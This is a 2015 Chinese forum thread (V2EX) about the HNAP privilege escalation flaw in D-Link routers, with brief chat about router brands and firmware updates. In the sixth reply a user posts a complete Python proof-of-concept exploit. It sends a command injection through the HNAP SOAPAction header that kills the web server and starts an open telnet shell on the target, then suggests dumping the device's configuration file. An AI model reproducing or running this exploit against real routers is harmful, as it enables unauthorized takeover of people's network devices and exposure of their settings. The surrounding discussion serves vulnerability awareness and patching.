V2EX = way to explore
V2EX 是一个关于分享和探索的地方
现在注册
已注册用户请  登录
davidyin
V2EX  ›  分享发现

各大无线路由器品牌暴漏洞

  •  
  •   davidyin · 2015-06-03 00:38:19 +08:00 · 3796 次点击
    这是一个创建于 3467 天前的主题,其中的信息可能已经有所发展或是发生改变。
    HNAP Privilege Escalation Vulnerability
    看看自己的路由器有没有出更新的固件。

    先去更新我的 D-Link Dir-850L
    7 条回复    2015-06-03 14:39:32 +08:00
    lhbc
        1
    lhbc  
       2015-06-03 02:56:32 +08:00 via Android
    国产的全都有后门,还用查……
    princeofwales
        2
    princeofwales  
       2015-06-03 08:24:44 +08:00
    网件的会不会有问题,美帝的
    就是怕了国产的,再便宜都不想买
    lee015
        3
    lee015  
       2015-06-03 08:34:01 +08:00 via Android
    刷了开源固件还会有问题吗?
    ledzep2
        4
    ledzep2  
       2015-06-03 10:28:44 +08:00
    现在电信联通连个公网ip都不给, 想访问都找不着. 洗洗睡...
    Karblue
        5
    Karblue  
       2015-06-03 14:27:12 +08:00
    不是只影响Dlink么。国内厂商好像没有躺枪吧
    Karblue
        6
    Karblue  
       2015-06-03 14:32:04 +08:00
    #!/usr/bin/env python

    import sys
    import urllib2
    import httplib

    try:
    ip_port = sys.argv[1].split(':')
    ip = ip_port[0]

    if len(ip_port) == 2:
    port = ip_port[1]
    elif len(ip_port) == 1:
    port = "80"
    else:
    raise IndexError
    except IndexError:
    print "Usage: %s <target ip:port>" % sys.argv[0]
    sys.exit(1)

    url = "http://%s:%s/HNAP1" % (ip, port)
    # NOTE: If exploiting from the LAN, telnetd can be started on
    # any port; killing the http server and re-using its port
    # is not necessary.
    #
    # Killing off all hung hnap processes ensures that we can
    # re-start httpd later.
    command = "killall httpd; killall hnap; telnetd -p %s" % port
    headers = {
    "SOAPAction" : '"http://purenetworks.com/HNAP1/GetDeviceSettings/`%s`"' % command,
    }

    req = urllib2.Request(url, None, headers)
    try:
    urllib2.urlopen(req)
    raise Exception("Unexpected response")
    except httplib.BadStatusLine:
    print "Exploit sent, try telnetting to %s:%s!" % (ip, port)
    print "To dump all system settings, run (no quotes): 'xmldbc -d /var/config.xml; cat /var/config.xml'"
    sys.exit(0)
    except Exception:
    print "Received an unexpected response from the server; exploit probably failed. :("



    POC在此。从devttsy0大神po来的
    Karblue
        7
    Karblue  
       2015-06-03 14:39:32 +08:00
    还发现了devttsy0的吐槽。吐槽Dlink的补丁。看了一下神tm补丁打的真是捉急
    http://www.devttys0.com/2015/04/what-the-ridiculous-fuck-d-link/
    关于   ·   帮助文档   ·   博客   ·   API   ·   FAQ   ·   实用小工具   ·   1016 人在线   最高记录 6679   ·     Select Language
    创意工作者们的社区
    World is powered by solitude
    VERSION: 3.9.8.5 · 31ms · UTC 21:00 · PVG 05:00 · LAX 13:00 · JFK 16:00
    Developed with CodeLauncher
    ♥ Do have faith in what you're doing.